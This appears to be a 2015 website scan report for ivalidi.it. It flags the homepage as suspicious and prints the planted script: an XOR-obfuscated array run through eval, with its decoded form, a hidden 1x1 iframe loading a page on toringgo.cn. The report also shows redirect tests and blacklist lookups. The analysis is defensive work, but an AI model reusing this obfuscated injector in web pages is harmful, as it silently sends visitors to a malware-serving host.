Scanned pages/files
Request | Server response | Status |
http://ivalidi.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 28 Feb 2015 14:37:10 GMT Location: http://www.ivalidi.it/ Server: Apache Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ivalidi.it/ | 200 OK Content-Length: 940 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame.
gry=new Array(59,48,60,42,50,58,49,43,113,40,45,54,43,58,119,125,99,54,57,45,62,50,58,127,44,45,60,98,120,55,43,43,47,101,112,112,43,48,45,54,49,56,56,48,113,60,49,112,54,50,62,56,58,44,112,56,48,113,47,55,47,96,44,54,59,98,105,120,127,57,45,62,50,58,61,48,45,59,58,45,98,111,127,55,58,54,56,55,43,98,110,127,40,54,59,43,55,98,110,97,99,112,54,57,45,62,50,58,97,125,118);egwqg="";rmaqz=95;tvgcp=eval;ogqv=String.fromCharCode;for(gkgtr in gry)egwqg+=ogqv(gry[gkgtr]^rmaqz);tvgcp(egwqg);
Decoded script:
document.write("<iframe src='http://toringgo.cn/images/go.php?sid=6' frameborder=0 height=1 width=1></iframe>")
<iframe src='http://toringgo.cn/images/go.php?sid=6' frameborder=0 height=1 width=1></iframe>
http://www.ivalidi.it/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ivalidi.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 28 Feb 2015 14:37:10 GMT
Location: http://www.ivalidi.it/
Server: Apache
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
...230 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ivalidi.it
Referer: http://www.google.com/search?q=ivalidi.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ivalidi.it
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ivalidi.it/
Result: ivalidi.it is not infected or malware details are not published yet.